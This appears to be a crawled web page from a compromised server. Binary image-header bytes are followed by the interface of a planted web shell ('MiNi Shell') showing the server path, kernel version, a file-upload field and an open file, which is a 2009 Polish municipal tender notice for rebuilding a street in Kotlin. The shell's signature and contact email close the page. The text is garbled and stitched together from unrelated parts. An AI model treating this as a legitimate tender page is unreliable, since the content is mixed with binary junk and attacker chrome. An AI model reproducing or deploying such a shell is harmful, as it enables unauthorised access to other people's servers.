JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090818/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090818/281998-N-2009.html

<p class="kh_header"><b>Kotlin: Przebudowa ulicy I.Krasickiego w miejscowości Kotlin</b><br>
<b>Numer ogłoszenia: 281998 - 2009; data zamieszczenia: 18.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Kotlin , ul. Powstańców Wielkopolskich 1, 63-220 Kotlin, woj. wielkopolskie, tel. 062 7405481, faks 062 7405481.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kotlin.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa ulicy I.Krasickiego w miejscowości Kotlin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje przebudowę ulicy I. Krasickiego w miejscowości Kotlin.
Zakres prac do wykonania :
a) roboty przygotowawcze, które obejmują :
- roboty pomiarowe - wytyczenie trasy poszczególnych warstw nawierzchni, wyznaczenie punktów głównych trasy, przebiegu kanalizacji deszczowej itp. Roboty pomiarowe obejmują równieżwykonanie badań kontrolnych oraz inwentaryzacji powykonawczej,
- roboty rozbiórkowe - rozebranie krawężnika na ławie betonowej z oporem wraz z utylizacją gruzu, rozebranie chodnika z kostki betonowej oraz opornika betonowego na skrzyzowaniu ulic Rymarkiewicza i Krasickiego,
b) roboty ziemne, które obejmują :
- mechaniczne wykonanie wykopów o odpowiedniej głębokości wraz z załadunkiem i przerzutem materiału w miejsca wykonania nasypu,
- odspojenie materiału, załadunek oraz odwiezienie w miejsca wskazane przez inwestora
- wykonanie nasypów w miejscu projektowanego chodnika z kruszywa uzyskanego z wykopu. Zagęszczenie warstw nasypu do wskazań określonych w SST,
- wykonanie koryta pod warstwy konstrukcyjne
c) podbudowy z kruszywa łamanego, która obejmują :
- podbudowa pomocnicza z kruszywa stabilizowanego cementem - roboty polegają na zakupie, dowiezieniu, rozłożeniu oraz zagęszczeniu warstwy betonu o Rm = 5 MPa.
grubość warstwy po zagęśzczeniu 10 cm,
- prace związane z wykonaniem podbudowy z kruszywa łamanego stabilizowanego mechanicznie obejmują rozłożenie kruszywa łamanego o uziarnieniu 0/31,5 mm  warstwą 0 cm po zagęszczeniu na odcinku od KM 0 + 000,00 do KM 0+ 162,19, profilowanie warstwy do uzyskania odpowiednich spadków wraz z zagęszczeniem podbudowy do uzyskania zagęszczeń i nośności przewidzianych w SST,
- prace związane z wykonaniem nawierzchni wjazdów obejmują rozłożenie kruszywa łamanego o uziarnieniu 0/31,5 mm warstwą 10 cm po zagęszczeniu na wjazdach do posesji. Profilowanie warstwy do uzyskania odpowiednich spadków wraz z zagęszczeniem nawierzchni do uzyskania zagęszczeń i nośności przewidzianych w SST,
d) nawierzchnia
Wykonanie nawierzchni obejmuje następujący zakres prac :
- skropienie podbudowy z kruszywa łamanego stabilizowanego mechanicznie emulsją asfaltową,
- wykonanie warstwy wiążącej o gr. 4 cm z betonu asfaltowego o uziarnieniu 0/16,00 mm,
- skropienie warstwy wiążącej o gr. 4 cm z betonu asfaltowego o uziarnieniu 0/12,8 mm,
- skropienie warstwy wiążącej emulsją asfaltową,
- wykonanie warstwy ścieralnej o gr. 4 cm z betonu asfaltowego o uziarnieniu 0/12,8 mm,
d) roboty brukarskie
Wykonanie robót brukarskich obejmuje :
- wykonanie krawężników 15x30 cm na ławie betonowej z oporem,
- wykonanie ławy i oporu z betonu B-MPa pod krawężniki i ścieki,
- wykonanie ścieku przykrawężnikowego z dwóch rzędów kostki na ławie betonowej,
- wykonanie obrzeży o gr. 6 cm wzdłuż chodników,
- wykonanie nawierzchni chodników z kostki betonowej na podsypce cementowo - piaskowej przy przejściu dla pieszych.
f) kanalizacja deszczowa
Wykonanie kanalizacji deszczowej obejmuje :
- wykonanie kolektora z rur o średnicy 315 mm wraz z włączeniem ich do istniejącej sieci kanalizacji deszczowej,
- wykonanie studni rewizyjnych z rur betonowych o średnicy 1000 mm,
- wykonanie przykanalików z rur o średnicy 200mm,
- wykonanie wpustów kanalizacji deszczowej
g) roboty wykończeniowe
Wykonanie robót wykończeniowych obejmuje następujący zakres prac :
- ustawienie słupków do znaków drogowych w miejscach wskazanych przez projekt,
przymocowanie tablic znaków - znak D-4a, T-6 oraz A7
- regulacja wysokościowa włazów studni kanalizacji sanitarnej oraz zaworu wodociągowego - dostosowanie do projektowanej niwelety
h) roboty telekomunikacyjne
- wykonanie zabezpieczenia istniejącej linii telekomunikacyjnej rurą osłonową dwudzielną typu A 120 PS.
Obliczenie ilości robót :
1. Roboty przygotowawcze :
- roboty pomiarowe przy liniowych robotach ziemnych - trasa drogi w terenie równinnym - 162,19 m,
- rozebranie krawężników betonowych 20x30 cm na ławie betonowej - 18 m,
- rozebranie obrzezy betonowych gr 6 cm - 18 m,
- rozebranie chodnika zkostki betonowej gr 8 cm - 32,4 m2,
Roboty ziemne :
- wykopy wykonane mechanicznie w gr. kat. III z załadunkiem i transportem urobku samochodami samowyładowczymi na odległość do 1 km ( przewóz urobku w miejsca budowy nasypów lub odwóz z placu budowy ) - 298 m3,
- dodatek za 4 km odwozu gruntu uzyskanego z wykopów ( łączna odległość wywozu 5 km ) - 298 m3,
- roboty ziemne poprzeczne - ( kat. gr. III ) - 55 m3,
- formowanie i zagęszczanie nasypów w gruncie kat. III - grunt uzyskany z wykopów - 55 m3,
- wykonanie koryta pod jezdnię oraz pod wjazdy do posesji oraz chodnik gł. 20 cm - 945,43 m2 ( w tym 100 m2 wjazdy pod posesje )
3. Podbudowy :
- podbudowa pomocnicza z kruszywa łamanego stabilizowanego cementem o Rm = 5 MPa - 845,43 m2,
- nawierzchnia wjazdów na posesje z kruszywa łamanego 0/31,5 mm ( granit, melafir, gabro) stabilizowanego mechanicznie - warstwa o grubości po zagęszczeniu 10 cm. Wjazdy na posesje 100 m 2,
- podbudowa zasadnicza z kruszywa łamanego 0/31,5 mm ( granit, melafir, gabro) stabilizowanego mechanicznie - warstwa o grubości po zagęszczeniu 20 cm - 845,43 m2,
4. Nawierzchnie :
- oczyszczenie i skropienie podbudowy emulsją asfaltową w ilości 0,5 kg/m2 - 845,43 m2,
- nawierzchnia z betonu asfaltowego KR 1-2 o uziarnieniu 0-16 mm - warstwa wiążąca - grubość po zagęszczeniu 4 cm - 845,43 m2,
- oczyszczenie i skropienie warstwy wiążącej z betonu asfaltowego emulsją asfaltową w ilości 0,3 kg/m2 - 845,43 m2,
- nawierzchnia z betonu asfaltowego KR 1-2 o uziarnieniu 0-12,8 mm - warstwa ścieralna - grubość po zagęszczeniu 4 cm - 845,43 m2,
5. Roboty brukarskie :
- krawężniki betonowe wystające o wymiarach 15x30 cm na podsypce cementowo - piaskowej - 335 m,
- ściek uliczny z dwóch rzędów kostki brukowej betonowej 287 x 0,20 m = 57,40 m2,
- ława betonowa, beton B-15 pod krawężnik i ściek z betonowej kostki brukowej - 49,44 m3,
- nawierzchnia chodnika z kostki brukowej betonowej gr. 8 cm na podsypce cementowo - piaskowej - 39,52 m2,
strona prawa jezdni - 15,21 m2
strona lewa jezdni - 24,31 m2
- obrzeże betonowe o wymiarach 30x6 cm na podsypce cementowo - piaskowej z wypełnieniem szczelin piaskiem - 28,22 m
strona prawa jezdni - 16,21 m
strona lewa jezdni - 12,01 m
6. Kanalizacja deszczowa :
- studzienki ściekowe z gotowych elementów betonowych o średnicy 500 mm z osadnikiem i syfonem wraz z wykopem, obsypaniem piaskiem i odwozem nadmiaru gruntu z wykopu na odległość do 10 km - 9 szt.
- pzrykanaliki z rur PCV o nom. śr. 200 mm wraz z wykopem, obsypaniem piaskiem i odwozem nadmiaru gruntu z wykopu na odległość do 10 km - 23,75 m,
- kolektor deszczowy z rur PCV o śr. nom 315 mm wraz z wykopem, obsypaniem piaskiem i odwozem nadmiaru gruntu z wykopu na odległość do 10 km - 130,50 m,
- studnie reizyjne z kręgów betonowych o śr. 1000 mm o gł. 3m wraz z wykopem, obsypaniem piaskiem i odwozem nadmiaru gruntu z wykopu na odległość do 10 km - 6 szt.
7. Roboty wykończeniowe :
- słupki do znaków drogowych z rur stalowych o śr. 70 mm - 2 szt.,
- przymocowanie tablic znaków drogowych ostrzegawczych i informacyjnych o powierzchni 0,3 m2 - 3 szt,
- regulacja wysokościowa studzienek dla zaworów wodociągowych - 13 szt.,
- regulacja pionowa wysokościowa dla włazów studni kanalizacyjnych - 6 szt.
ROBOTY  TELEKOMUNIKACYJNE
- wykonanie zabezpieczenia istniejącej linii telekomunikacyjnej rurą osłonową dwudzielną typu A 120 PS -10 m.
Ponadto szczegółowy zakres prac ujeto w :
- dokumentacji projektowej,
- specyfikacji technicznej wykonania i odbioru robót,
- przedmiarze robót..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.20-6, 32.55.14.00-4.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości : 3.000,00 zł
słownie : trzy tysiące złotych 00/100<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ustawy z dnia 29 stycznia 2004 r. z zmianami Prawo zamówień publicznych oraz nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy Prawo zamówień publicznych :
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
- posiadają niezbędną wiedze  i doświadczenie oraz potencjał techniczny, a także dysponują osobami zdolnymi do wykonania zamówienia
a) wykonawca powinien dysponować nstępującym sprzętem własnym lub w stałej dyspozycji :
- koparka podsiębierna lub koparko - ładowarka,
- równiarka,
- spycharka,
- walec statyczny samojezdny,
- walec statyczny samojezdny ogumiony,
- walec wibracyjny ( roboty ziemne ),
- zagęszczarka płytowa,
- samochody samowyładowcze o ładowności 10-15 t.,
- skrapiarka do bitumu,
- rozkładarka mas bitumicznych,
- szczotka mechaniczna,
- piła mechaniczna do cięcia nawierzchni z mas bitumicznych,
- beczkowóz.
b) wykonawca musi dysponować osobami z uprawnieniami zawodowymi niezbędnymi do wykonania przedmiotu zamówienia oraz musi zapewnić uczestnictwo w wykonaniu zamówienia kierownika budowy posiadającego odpowiednie do zakresu zamówienia uprawnienia budowlane, będącego czynnym członkiem Okręgowej Izby Inżynierów Budownictwa,
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia : wykonawca musi posiadać środki finansowe ( własne ) lub zdolność kredytową w wysokości nie mniejszej niż 150.000,00 zł,
d) udokumentują, że w okresie ostatnich pięciu ( 5 ) lat ( rozpoczęli i zakończyli ), przed dniem wszczęcia postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należycie i rzetelnie wykonali co najmniej 2 ( dwie ) roboty budowlane odpowiadające swoim zakresem i charakterem robotom stanowiącym przedmiot zamówienia. Przez podobną  robotę budowlaną Zamawiający rozumie budowę , przebudowę dróg o nawierzchni bitumicznej - w przypadku składania oferty przez podmioty wspólne warunek musi spełnić co najmniej jeden podmiot,
e) udzielą gwarancji co najmniej na 3 ( trzy ) lata od dnia odbioru końcowego,
f) wniosą wadium w wymaganym terminie w wysokości 3.000,00 zł, słownie : trzy tysiące złotych 00/100.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawca zobowiązany jest złożyć następujące dokumenty :
1. Ofertę na formularzu oferty, o tresci zgodnej z określoną w wzorze stanowiącym załącznik nr 1 do SIWZ,
2. Oświadczenia oraz dokumenty potwierdzanie spełniania warunków :
a) dokument potwierdzający dopuszczenie wykonawcy do obrotu prawnego w zakresie objetym zamówieniem - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) umowa spółki - w przypadku, gdy wykonawcą jest spółka cywilna lub jawna,
c) pełnomocnictwo ustanawiające pełnomocnika w przypadku wnoszenia oferty wspólnej,
d) oświadczenie o treści określonej w art. 22 ust. 1 ustawy Prawo zamówień publicznych,
e) oświadczenie o treści określonej w art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
f) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału ZUS lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwonienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
g) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1, pkt. 4-8 ustawy Prawo zamówień publicznych wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania oferty ( w przypadku, gdy wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z wykonawców ),
h) Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1, pkt 9 ustawy Prawo zamówień publicznych wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert ( w przypadku, gdy wykonawcy występują wspólnie stosowne dokumenty dostarczy każdy z wykonawców ),
i) wykaz co najniej dwóch ( 2 ) robót wykonanych i zakończonych w ciągu ostatnich pięciu ( 5 ) lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie w zakresie będącym przedmiotem zamówienia z podaniem ich wartości oraz daty wykonania oraz odbiorów wraz z załączeniem dokumentów potwierdzających , ze roboty te zostały wykonane należycie .
( referencje, listy, rekomendacje ) - wg wzoru stanowiącego załącznik nr 2 do SIWZ ,
j) informacja banku prowadzącego rachunek bankowy wykonawcy, w której potwierdza się posiadanie środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 150.000,00 PL wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
k) wykaz osób i podmiotów, które będą uczestniczyć w wykonaniu zamówienia wraz z załączonymi uprawnieniami i aktualnym zaświadczeniem o przynależności do Okręgowej Izby Samorządu Zawodowego - wg wzoru stanowiącego załącznik nr 3 do SIWZ. Pracownicy produkcyjni ( operatorzy sprzętu, kierowcy itp. ) , którzy zostaną wytypowani do realizacji zadania muszą posiadać odpowiednie uprawnienia - co należy potwierdzić odpowiednimi dokumentami. Wszyscy pracownicy produkcyjni winni posiadać aktualne badania lekarskie oraz być przeszkoleni w zakresie BHP , co wykonawca poświadczy składając na tą okoliczność oświadczenie,
l) wykaz sprzętu, którym będzie dysponował wykonawca przy realizacji niniejszego zamówienia - wg załącznika nr 4 do SIWZ,
m) dokument potwierdzający wniesienie wadium,
n) oświadczenie o udzielonej gwarancji na przedmiot umowy zgodnie z wzorem stanowiącym załącznik nr 5 do SIWZ,
o) informacja o podwykonawcach - załącznik nr 6 do SIWZ,
p) wypełniony i parafowany podpisem wykonawcy wzór umowy w oparciu o formularz  stanowiący załącznik do SIWZ,
r) wypełniony kosztorys ofertowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kotlin.bip.net.pl > gmina .> przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy w Kotlinie , pokój nr 10
63-220 Kotlin, ul. Powstańców Wlkp. 3.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2009 godzina 10:00, miejsce: Urząd Gminy w Kotlinie, pokój nr 10
63-220 Kotlin, ul. Powstańców Wlkp. 3.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com